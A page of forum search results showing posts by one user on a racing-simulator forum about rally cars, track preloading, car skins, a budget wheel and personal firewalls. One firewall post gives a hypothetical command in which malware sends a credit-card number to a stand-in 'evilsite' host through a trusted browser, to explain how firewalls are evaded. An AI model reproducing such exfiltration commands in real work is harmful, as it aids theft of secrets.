Searching in All forums
(19 results)
aDRENOcHROME
S2 licensed
As far as I have heard, the Super 2000 class was considered to be a cheap entry class for upcoming drivers in the WRC class. But the S2000 class got expensive very quickly and they are back at square one.

If you haven't seen a S2000 screaming, go have a look at this video:
http://adrenochrome.zero.googl ... om/OMV_ADAC_2006_Xvid.avi
... which i shot at the WRC Rally Germany in 2006.

The fourth car, the yellow one, at around 0:38 is a Super 2000.

cu.aC

P.S.: If above link doesn't work, try:
http://adrenochrome.zero.googl ... adacrallyedeutschland2006
... where you will find two pics of the rally and a link to the video.
Last edited by aDRENOcHROME, .
aDRENOcHROME
S2 licensed
Thank you very much!

Great tutorial
aDRENOcHROME
S2 licensed
Just tested the U18.

Scawen, thank you for the 'Load track when starting' feature. Works like a charm.
aDRENOcHROME
S2 licensed
Quote from sil3ntwar :If you want to preload tracks then go options->misc->Intro/Exit screen. Setting to show will preload tracks setting to skip will fast start.

Thank you! I tried that before and it didn't 'feel' right to me. Let me explain ... this will paint me even more nitpicking

I don't like interaction which isn't needed. In case of having 'Show Intro' enabled, i have to abort the intro with the escape key (mouse doesn't work here) and have to click through one additional screen when exiting. This is definitely not a biggie, but it's poking me every time just a little ... the T-style preloading was perfect for me and i miss it.
aDRENOcHROME
S2 licensed
(Disclaimer: Read the U14 thread, read this thread, tried the U14 a couple of times)

There are a few things that i don't like ...

Short: I would love to have the old T-style preloading of tracks back via an option to turn it on/off and I would like to be 'auto-joined' to a hot lap race.

Reason: I usually hotlap using a track car combo i currently 'work' on. In T-days i could:
1) fire LFS up
2) click on 'Hot lapping'
3) click 'Ready' and give it a spin.

Now i have to:
1) start LFS
2) click on 'Hot lapping'
3) select a track ... which i have to remember
4) 'join race' ... where there is no other option
5) click ready and give it a spin

Step 3 is OKish for me now (since U14), but i still would love to have the track preloaded.
Step 4 is realy not needed since there is nobody else than me who might hotlap

Besides that U14 is fine for me and i realy like the improvements.
aDRENOcHROME
S2 licensed
Quote from Scawen :But... a router can only stop things listening as servers (because you have to specifically tell the router to forward the specified port to the specified local ip address). It doesn't stop anything you run on your computer, from accessing the internet. I'm pleased that my software firewall stops so many programs accessing the internet! So many programs you install, immediately try to send some info somewhere, and I really do not want these programs "phoning home" without my consent. Who knows what info they are going to send?

I'm fully aware of this and i ran software firewalls for years, so i know what you are talking about. But I think in most cases either the risk is low or the firewall will not protect me sufficiently. Let me get into this ...

IMHO There are two types of applications i would like to keep from accessing network resources:
1) bad mannered standard applications (eg. phone home software)
2) malicious software (eg. trojans, viruses, ...)

In case of (1) 'phoney software', it boils down to trust and keeping sensitive data safe. On top of this i have heaps of realy boring data on my HD and i doubt any software will find something interesting to phone home about. Again this is not about evil software, just chatty phone home applications. So the risk is low (on my computer).

Another thing i noticed is that in times of the 'intarweb' a lot of applications are net-bound by nature, so you either cannot block net access without making it useless or you open up your firewall. There's just no way to tell legitimate from nasty traffic. Catch22

Case (2) 'the evildoers' is something completely different. In my opinion you cannot block malicious traffic because you usually have at least one trusted application in your 'firewall'. Lets say you have IE in your trusted list of apps. What prevents evil app (tm) from calling 'IEXPLORE.EXE http://evilsite,com/eat.php?mycreditcard=123456'. Or even worse injecting code into the trusted app (DLL inject) and piggyback sensitive data reusing trusted network connections. As far as i know software firewalls still do the fingerprinting 'on disk' and not 'in memory' so it will go unnoticed. Considering recent virus descriptions it also seems to be possible to simply kill the firewall process and happily send data unnoticed.

To sum it all up ... I (and it might only work for me) rely on trusted software and keeping sensitive data safe. The small gain in protection for me is not worth the trouble i had with recent sw firewalls.

Edit: One thing i forgot. Considering the constant nagging of sw firewalls that this or that application wants net access, endusers tend to allow a lot more apps access than needed. They just want to get rid of the message box. Another problem is that a user has to grant permission based on the path and name of the application. Let's say i'm an evil programmer and i wrote a software called 'IEXPLORE.EXE' located in 'c:\programms\'. Which user would think 'ahh this is strange usually IE lives in ...'? I bet 90% would grant the application access thinking 'stupid firewall i told you zillion times that IE is trusted'. OK, i'll stop ranting ... in the end i would always trust LFS.exe
Last edited by aDRENOcHROME, .
aDRENOcHROME
S2 licensed
Quote from biggie :
Connection origin : local initiated
Protocol : Raw Ethernet
Local Address : 0.0.0.0
Destination: ff-ff-ff-ff-ff-ff
Source: 00-50-70-92-14-2b
Type: ARP (0x0806)
Address Resolution Protocol (ARP)
Hardware type: Ethernet (0x0001)
Protocol type: IP (0x0800)
Opcode: Request
Sender hardware address: 00-50-70-92-14-2b
Sender IP address: 192.168.4.100
Target hardware address: 00-00-00-00-00-00
Target IP address: 192.168.4.254

What exactly is LFS trying to achieve?

OK, now for some (ether) networking 101.

Skip to 'In plain english' if you don't want to be confused by networking details

On a ethernet network devices need the hardware address (MAC address) of each other to be able to communicate. If you are running a TCP/IP protocol over a ethernet network, your computer needs to know which IP address (e.g. 192.168.1.1) corresponds to which MAC/hardware address (e.g. 00-50-56-C0-00-01).

To get this information your computer will broadcast a 'ARP request' containing the IP address of a device of which it likes to know the MAC/hardware address. Usualy this 'ARP request' is not sent by the application itself, it is part of the address resolution (see ARP) handled by the OS. The response to the above request will be sent by the device listening to the target IP address.

In your case the application wanted to know the MAC/hardware address of the device listening to the IP address 192.168.4.254. This is absolutely harmless and standard procedure.

In plain english

Your computer shouted 'Who is listening to 192.168.4.254 and where does he live'. This is absolutely normal and happens all the time when your computer is trying to talk to a computer in your local network via TCP/IP. Those ARP packets are never sent to the internet because nobody in the outer world would care.

What i wonder is, what crappy software 'firewall' does give you that kind of useless information?

On a personal side note: I so hate 'personal firewalls'! If you are on DSL/cable get a cheap router and live in peace.
Last edited by aDRENOcHROME, .
aDRENOcHROME
S2 licensed
Quote from al heeley :It's on a par with the 'fake' shadows, I think they are not always necessary but they add a little depth. Have a look yourself at the skin driving round the track. See what you think

Hey i took your skin for a walk in SO and also an edited version without the highlights. Yup you are right it does make a pretty noticeable difference and on top of it all it looks realy good. When i edited your skin i noticed how many details you used in your skin (all the nuts and bolts, small grooves on the nose, the tank caps). Too bad that they are barely visible in the game and especially online with a 512x512 resized skin.

I was always reluctant to use 'canned' highlights and shadows because i thought it should be done by the graphics engine. Guess i was wrong ...

Have you ever tried to use a fake shadow under the side mirrors (especialy on the GT and street cars)?
aDRENOcHROME
S2 licensed
Quote from al heeley :BF1 3M Racing.
Trying for a dark charcoal skin to offset the vivid red logo, ...

Cool, i love blackish skins and yours is great.

One question. I noticed that you are doing 'fake' highlights on the edges. Does it realy work (is noticeable as an accentuation of the models edges) or is there another reason?

Again, good work
aDRENOcHROME
S2 licensed
Quote from Apex :cheers any free programes out there that i can DL for this

Raster graphics:Vector graphics:
aDRENOcHROME
S2 licensed
Quote from Sawyer :The only way for this to work would be if the skins are loaded into memory of your GFX card only. I havent heard about anybody extracting anything for a GFX yet since all hacks are done to extract stuff from computer memory only and nobody did yet need to crack textures.

Nope that wouldn't work because:
  1. the Texture Data has to pass through the conventional RAM before it can be transfered to the GFX card
  2. you can easily get the data back from your GFX card (ie. screenshots or more technically a function like glReadPixels)
aDRENOcHROME
S2 licensed
Great job, well done! Thank you
aDRENOcHROME
S2 licensed
Quote from kornaz :Yeah, i think they are making last test oj last hours, be4 releasing it. Be oatience, god damn! And for the guy, who posted be4, about not seeing clouds of smoke - are you a loser or something? Formulas have advanced so much, and the drivers are not noobs like u. They try their best not to spin tires at all, but get the best start! Jeesus....

File under 'Money on anger management class well spent'
Have a flower [etals:]
aDRENOcHROME
S2 licensed
I do have one (the red one, don't know about yellow ones) and i think it's quite good especially for the price you mentioned.

Lock to lock it's 270 degrees. (EDIT: it's 200 ... just checked )

Positive:
+ reasonably priced (especially for 10 pounds)
+ FF has quite a punch
+ didn't break in the last 2-3 years i used it

Negative:
- doesn't have a precision feel to it, everything is a bit wobbly
- two more buttons would be nice (got 4 on the front and 2 paddle shifters on the back)


Even if you are not satisfied it will be a nice backup if 'the one to come after it' will break ...
Last edited by aDRENOcHROME, .
Next something sane
aDRENOcHROME
S2 licensed
... and now for something sane.

Another FZR skin that:
  • goes well with a mustache
  • has a classic touch giving the impression that you are into motor sports since the early 60s
  • doesn't need a color monitor
Use almost as you like. License see skin.
Last edited by aDRENOcHROME, .
Revolting colors
aDRENOcHROME
S2 licensed
The ideal FZR skin for:
  • wreckers because you can wreck twice (from the right and the left side, people won't remember you :razz
  • making a not very sane impression
  • giving color blind people an advantage
Use almost as you like. License see skin.
Last edited by aDRENOcHROME, .
Hehe
aDRENOcHROME
S2 licensed
Quote from Shotglass :(dont pick it up pick it ... dont pick ..... lets see if anyone gets this )

I remember Dirk long ago darkly saying to me that his tea that time got some soul ... i too wonder if anyone gets this
aDRENOcHROME
S2 licensed
Did somebody say hillclimb? Vote me in.

Check out 'Climb Dance' (Ari Vatanen @ Pike's Peak)
http://www.gofastvideo.com/gal ... -videos/rally+videos.html
FGED GREDG RDFGDR GSFDG